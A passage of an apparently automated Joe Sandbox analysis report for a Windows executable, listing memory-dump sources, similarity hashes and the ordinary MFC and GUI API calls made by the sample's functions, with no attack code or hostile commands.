                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$FillH_prolog3OffsetWindow
                                                              • String ID: c
                                                              • API String ID: 1391168360-2927717585
                                                              • Opcode ID: 4315a0813e059256864b413a680bd992be48bb0f8a62c6d0adfc24168ade395e
                                                              • Instruction ID: fc990fa10e19bfd2238dcb8137689f4c564f1a7af840cfc413c563fe713bd2c9
                                                              • Opcode Fuzzy Hash: 4315a0813e059256864b413a680bd992be48bb0f8a62c6d0adfc24168ade395e
                                                              • Instruction Fuzzy Hash: AD4150719006199FCF01EFA9D9859EEBBBAFF49300B14046AF905EB251CB719E05CBA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FillParentRect
                                                              • String ID: P1d
                                                              • API String ID: 1540079046-528438609
                                                              • Opcode ID: 7eace3e2e8ed2a6e0a514aab018704da3409dcd6bc775cad579a2e5ef91a8b82
                                                              • Instruction ID: 213e3c542cd4b29f01a287cb9403ec032107296ecb6b76ab7125c9809ae1e3e0
                                                              • Opcode Fuzzy Hash: 7eace3e2e8ed2a6e0a514aab018704da3409dcd6bc775cad579a2e5ef91a8b82
                                                              • Instruction Fuzzy Hash: 0931A231500204EBCF00DFA5CC9DAAE7BAAFF49314F11056AFA059B291DB75DE04CBA0
                                                              APIs
                                                              • ReleaseCapture.USER32 ref: 0050B7F4
                                                                • Part of subcall function 00585637: SetRectEmpty.USER32(?), ref: 0058568D
                                                                • Part of subcall function 00585637: IsRectEmpty.USER32(?), ref: 00585697
                                                                • Part of subcall function 00585637: SetRectEmpty.USER32(?), ref: 005856EE
                                                                • Part of subcall function 00585637: SetRectEmpty.USER32(?), ref: 005856F4
                                                              • IsWindowVisible.USER32(?), ref: 0050B711
                                                              • GetParent.USER32(?), ref: 0050B744
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect$CaptureParentReleaseVisibleWindow
                                                              • String ID: c
                                                              • API String ID: 1768054721-2927717585
                                                              • Opcode ID: 60bf6a84afdbe840a55e25c00027b2e02e50320a57bf57e76ed6dfaa1322b3bd
                                                              • Instruction ID: 38455b7830ee23a068ca23e895b71239ab92c1d124777442f94974a69abd0f58
                                                              • Opcode Fuzzy Hash: 60bf6a84afdbe840a55e25c00027b2e02e50320a57bf57e76ed6dfaa1322b3bd
                                                              • Instruction Fuzzy Hash: 7C31A4313006029FEB25AB69C899BBEBBA6FF84701F15006DE589872E1DF615C41CB55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L>a$LA`$`c
                                                              • API String ID: 0-2488346406
                                                              • Opcode ID: c9e8286feef1d9d10d74679058a215ff4eaf4aa317c0aacae37dafe08e99b393
                                                              • Instruction ID: 48c950d8f35852de2b8bb401a52ab7cd62dc11d6c5c3c3ce7db305af4f12392b
                                                              • Opcode Fuzzy Hash: c9e8286feef1d9d10d74679058a215ff4eaf4aa317c0aacae37dafe08e99b393
                                                              • Instruction Fuzzy Hash: 903198313047269A9F14A632ADD19BE2ADAFF93754F0A043BE44BD63C6DF18ED0182D4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientCopyH_prolog3_
                                                              • String ID: Afx:DockPane
                                                              • API String ID: 871324638-3269875795
                                                              • Opcode ID: 9ce240255a4fd1e363fc974f02eed8bdea2fbcdd9fe9690052db458ecd6f7712
                                                              • Instruction ID: 1be1f13c8190341d73ee8545e899ee1ba7852570559520179df9c17469e498ed
                                                              • Opcode Fuzzy Hash: 9ce240255a4fd1e363fc974f02eed8bdea2fbcdd9fe9690052db458ecd6f7712
                                                              • Instruction Fuzzy Hash: FD4106719002089FDF44DF94C899AEEBBB5FF08314F14846AF90AEB251CB349945CF60
                                                              APIs
                                                              • __snwprintf_s.LIBCMT ref: 004EC4DA
                                                              • __snwprintf_s.LIBCMT ref: 004EC50C
                                                                • Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf_s$__getptd_noexit
                                                              • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                              • API String ID: 101746997-2801496823
                                                              • Opcode ID: 9798716a1588e22eae29ad21c2d307264ac1998a6e53d0f685397dcaad824a00
                                                              • Instruction ID: 8a6c28ac1b5c217b13e3c520d2020c4a22b3257f4c71a07d3cfc1e52a03dcff8
                                                              • Opcode Fuzzy Hash: 9798716a1588e22eae29ad21c2d307264ac1998a6e53d0f685397dcaad824a00
                                                              • Instruction Fuzzy Hash: 403170B5D00209EFCB11EFA6D842AAE7BB4FF98351F00402BF905AB351D734A951CB66
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0052EB41
                                                                • Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2
                                                                • Part of subcall function 004ECCD1: GetDlgCtrlID.USER32(?), ref: 004ECCDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Ctrl
                                                              • String ID: %sBasePane-%d$%sBasePane-%d%x$IsVisible
                                                              • API String ID: 3879667756-4027084908
                                                              • Opcode ID: 54fd1fcac68b3f405cac0405f2ca3a025a3dd165a9f42df2081dc8825a352f12
                                                              • Instruction ID: 7fbd46752e30b59d09269b9042fb1629cf474e2c60c7c7d75f709ee32bc340b0
                                                              • Opcode Fuzzy Hash: 54fd1fcac68b3f405cac0405f2ca3a025a3dd165a9f42df2081dc8825a352f12
                                                              • Instruction Fuzzy Hash: 8431907190021AAFCF04EFB4C89A9BE7FA5BF15325B04455EF4269B2D2DA349A009791
                                                              APIs
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00544B2F
                                                              • IntersectRect.USER32(00000000,?,00000000), ref: 00544B97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: IntersectObjectRect
                                                              • String ID: NRT$TR`
                                                              • API String ID: 3895296623-2220355878
                                                              • Opcode ID: 308cb3fcdbeec5ec5c9f9d72aec8bfd93249ee4acf744128747256068ca35a86
                                                              • Instruction ID: 0b47e161435e08c6f8ec925f22dd7ee6960b44177e3a1d58ab1e66f400ef7b13
                                                              • Opcode Fuzzy Hash: 308cb3fcdbeec5ec5c9f9d72aec8bfd93249ee4acf744128747256068ca35a86
                                                              • Instruction Fuzzy Hash: BB314D71900218AFCF14CFA9D845BEEBBF9FF88314F14415AE505E6280DB749A45CF60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: 8`$Afx:Slider$P`
                                                              • API String ID: 431132790-3234085688
                                                              • Opcode ID: fc842c9a0d716f201c92a8c2dead8a46ac390d0a35e3ed70a28b369485f4e26a
                                                              • Instruction ID: 6cfe435a2d1b202b6b79a7503d2bfce59f59d60026e05012cef97b76b1f13011
                                                              • Opcode Fuzzy Hash: fc842c9a0d716f201c92a8c2dead8a46ac390d0a35e3ed70a28b369485f4e26a
                                                              • Instruction Fuzzy Hash: 73319C70200206AFCF19DF65C852BAA7BA2FF44314F14881EF81A9B391CB35E891CF94
                                                              APIs
                                                                • Part of subcall function 0055C168: __EH_prolog3.LIBCMT ref: 0055C16F
                                                                • Part of subcall function 0055C168: EnterCriticalSection.KERNEL32(00646EB4,00000000,004FC29A,00000001), ref: 0055C1CB
                                                                • Part of subcall function 0055C168: __beginthread.LIBCMT ref: 0055C1E5
                                                                • Part of subcall function 0055C168: SetThreadPriority.KERNEL32(00000000,000000FF), ref: 0055C1FE
                                                                • Part of subcall function 0055C168: LeaveCriticalSection.KERNEL32(00646EB4), ref: 0055C215
                                                                • Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66
                                                              • IsWindow.USER32(?), ref: 005204DB
                                                              • InvalidateRect.USER32(?,00000054,00000001,?,00000000,00000000,00520742), ref: 005204F1
                                                              • UpdateWindow.USER32(?), ref: 005204FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$CriticalSection$EnterH_prolog3InvalidateLeavePriorityRectShowThreadUpdate__beginthread
                                                              • String ID: <L`
                                                              • API String ID: 701223984-3276711095
                                                              • Opcode ID: 325f51c129588242e04ca0838999a3c3acd2eddf17e6533c719411fd5122d3ae
                                                              • Instruction ID: 25cf89614290bd1410a8a64c9b2cbb5e5961c1e62384c711337f66825f524088
                                                              • Opcode Fuzzy Hash: 325f51c129588242e04ca0838999a3c3acd2eddf17e6533c719411fd5122d3ae
                                                              • Instruction Fuzzy Hash: 1421E1313016109FCB21AB65D895EBEBBE6FF88B01F14406EF149872E2DB769801CB84
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,Function_0007F66F), ref: 005507C6
                                                              • KillTimer.USER32(?,?), ref: 005507E2
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 00550869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Timer$InvalidateKillRect
                                                              • String ID: (`
                                                              • API String ID: 2676148147-4108213102
                                                              • Opcode ID: 07cef56ccc392e847da41eff2b0e0794da2909d681a918a99ec4560bd895db8d
                                                              • Instruction ID: 9484b5cb7e2c8b15447c01b34bc83a27d1a890f87f40deeb3753dccf7a730a9f
                                                              • Opcode Fuzzy Hash: 07cef56ccc392e847da41eff2b0e0794da2909d681a918a99ec4560bd895db8d
                                                              • Instruction Fuzzy Hash: 0A21A731600B10EFD7229B15DC91C69BFE2FB89711725552FF945826B1D772E844CF40
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0052EC3C
                                                                • Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2
                                                                • Part of subcall function 004ECCD1: GetDlgCtrlID.USER32(?), ref: 004ECCDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Ctrl
                                                              • String ID: %sBasePane-%d$%sBasePane-%d%x$IsVisible
                                                              • API String ID: 3879667756-4027084908
                                                              • Opcode ID: 801845ccc1bfe42cfc0ef6de9e161af3df10a64cb5b90875f5caf7497b79ed0b
                                                              • Instruction ID: 1ab2f255d209f374ac8e2148378b916245e13d55458ef9eed33e5187c72a33cd
                                                              • Opcode Fuzzy Hash: 801845ccc1bfe42cfc0ef6de9e161af3df10a64cb5b90875f5caf7497b79ed0b
                                                              • Instruction Fuzzy Hash: 6321C371900215AFCF14AFA4C89A9BE7F66BF45324F04421EF826A73D1CA349E40D7A1
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0054B247
                                                                • Part of subcall function 0052EA58: __EH_prolog3.LIBCMT ref: 0052EA5F
                                                                • Part of subcall function 0052EA58: SetRectEmpty.USER32(?), ref: 0052EAF5
                                                                • Part of subcall function 00585176: SetRectEmpty.USER32(?), ref: 005851A8
                                                                • Part of subcall function 00585176: SetRectEmpty.USER32(?), ref: 005851AF
                                                              • SetRectEmpty.USER32(?), ref: 0054B32D
                                                              • SetRectEmpty.USER32(?), ref: 0054B356
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect$H_prolog3
                                                              • String ID: `c
                                                              • API String ID: 3752103406-2598275076
                                                              • Opcode ID: 2fcb43ab5756f0297d4e39f49e83c61bcd7dfc4a3c4e751dca6b6b163c86c6c7
                                                              • Instruction ID: 0ab1ca4c2a1eee8c21b2a230b5babf39b06427a6a57f481a8d18b42ce3f5e07f
                                                              • Opcode Fuzzy Hash: 2fcb43ab5756f0297d4e39f49e83c61bcd7dfc4a3c4e751dca6b6b163c86c6c7
                                                              • Instruction Fuzzy Hash: D34143B0805B81CFC3659F7A89896D6FBE0BB59300F90892ED1AE8B341DB756144CF84
                                                              APIs
                                                              • _memset.LIBCMT ref: 004DCE54
                                                              • GetSysColor.USER32(00000014), ref: 004DCE9E
                                                              • CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 004DCEF1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: BitmapColorCreate_memset
                                                              • String ID: (
                                                              • API String ID: 3930187609-3887548279
                                                              • Opcode ID: a07d9c1164a46bc8c65eba646e3117d789822934d66a8c7e472619add287ae59
                                                              • Instruction ID: 4b262e8b33e16a52c34e093c45ad7ac42cdbf2cbb62f6d662f18e048f615da65
                                                              • Opcode Fuzzy Hash: a07d9c1164a46bc8c65eba646e3117d789822934d66a8c7e472619add287ae59
                                                              • Instruction Fuzzy Hash: 7E21F571A11258DFDB04CBB8CC55BEDBBF4AF95700F00446EE646E7281DA355A48CB61
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00525927), ref: 004EF4CE
                                                              • GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 004EF4DE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: DWMAPI$DwmInvalidateIconicBitmaps
                                                              • API String ID: 1646373207-1098356003
                                                              • Opcode ID: c28c146f8820bb300dce3387ce85c07953de93d4586aa560507ee292b45a7bd1
                                                              • Instruction ID: b456abee8952fa3148736c030bdd4c1063671448cf6af93cf76e72dc580a704b
                                                              • Opcode Fuzzy Hash: c28c146f8820bb300dce3387ce85c07953de93d4586aa560507ee292b45a7bd1
                                                              • Instruction Fuzzy Hash: 45118172B002459BCB00EF7ADC84ABB77E5EF59301B141479A906EB281EE79DD08CB64
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0053AB4E
                                                                • Part of subcall function 0054B240: __EH_prolog3.LIBCMT ref: 0054B247
                                                                • Part of subcall function 0054B240: SetRectEmpty.USER32(?), ref: 0054B32D
                                                                • Part of subcall function 0054B240: SetRectEmpty.USER32(?), ref: 0054B356
                                                              • SetRectEmpty.USER32(?), ref: 0053AC55
                                                              • SetRectEmpty.USER32(?), ref: 0053AC5E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
